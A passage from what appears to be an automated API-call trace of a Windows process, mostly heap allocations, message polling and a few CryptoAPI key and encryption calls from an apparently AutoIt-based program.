0x7b1738 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0038.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0038.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.649] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0038.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0038.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.650] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0038.651] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0038.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.651] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0038.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.655] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.655] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da208, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da208*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.655] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.655] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.655] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.655] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0038.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.655] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.655] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.656] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.656] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.656] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.656] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.656] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.656] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.656] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.656] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.656] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.656] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.656] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.657] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.657] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x13874, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x13880) returned 1 [0038.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.657] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.657] CharLowerBuffW (in: lpsz="byte[80001]", cchLength=0xb | out: lpsz="byte[80001]") returned 0xb [0038.657] PeekMessageW (in: lpMsg=0x6ae83c, 